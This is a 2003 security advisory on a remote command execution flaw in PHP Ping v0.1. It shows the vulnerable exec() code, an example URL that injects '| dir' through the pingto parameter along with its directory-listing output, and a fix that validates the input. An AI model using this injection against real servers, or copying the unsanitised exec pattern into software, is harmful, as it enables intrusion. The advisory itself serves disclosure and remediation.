6th Mar 2003 [SBWID-6044]
COMMAND
	PHP Ping Remote Command Execution
SYSTEMS AFFECTED
	PHP Ping v0.1 and prior
PROBLEM
	Thanks to Grégory Le Bras  aka  GaLiaRePt  of  Security  Corporation  in
	security advisory [SCSA-009] :
	
	 http://www.security-corp.org/advisories/SCSA-009-FR.txt
	
	PHP ping  "will  allow  you,  provided  that  your  server  turns  under
	Windows, to realize a "ping" on the host of your choice."
	(direct quote from PHP Ping website)
	 DETAILS
	 ________________________________________________________________________
	A vulnerability have been found in PHP ping  which  allow  attackers  to
	execute remote command.
	This vulnerability would allow a remote attacker to compromise parts  of
	the operating system, possibly the complete operating system.
	Vulnerable code :
	
	<?
	//*************************************
	// FONCTION DU PING
	//*************************************
	function PHPing($cible,$pingFile){
	exec("ping -a -n 1 $cible >$pingFile", $list);
	$fd = fopen($pingFile, "r");
	while(!feof($fd))
	{
	$ping.= fgets($fd,256);
	}
	fclose($fd);
	return $ping;
	}
	//-------------------------------------
	?>
	
	 EXPLOIT
	 ________________________________________________________________________
	The vulnerability was discovered in the  page  for  execute  "ping",  at
	this adress :
	
	http://[target]/phpping/index.php?pingto=www.security-corp.org%20|%20dir
	
	This exploit simply show the contents of the current repertory.
	
	c:\phpping
	03/03/2003  23:01       <DIR>          .
	03/03/2003  23:01       <DIR>          ..
	03/03/2003  23:00       <DIR>          img
	30/04/2002  23:13                3217 index.php
	30/04/2002  23:19                  921 README
	03/03/2003  23:03                    0 resultat.ping
	3 file(s)            4138 bytes
	3 Dir(s)  11413962752 bytes free
	
SOLUTION
	For example use this code :
	
	<?
	//*************************************
	// FONCTION DU PING
	//*************************************
	function PHPing($cible,$pingFile){
	# BugFix by Gregory LEBRAS www.security-corp.org
	if( (!$cible) ||
	(!preg_match("/^[\w\d\.\-]+\.[\w\d]{1,3}$/i",$cible)) ){
	echo("Error: Please specify a valid target host or IP.");
	exit;
	}
	else
	{
	exec("ping -a -n 1 $cible >$pingFile", $list);
	$fd = fopen($pingFile, "r");
	while(!feof($fd))
	{
	$ping.= fgets($fd,256);
	}
	fclose($fd);
	return $ping;
	}
	}
	//------------------------------------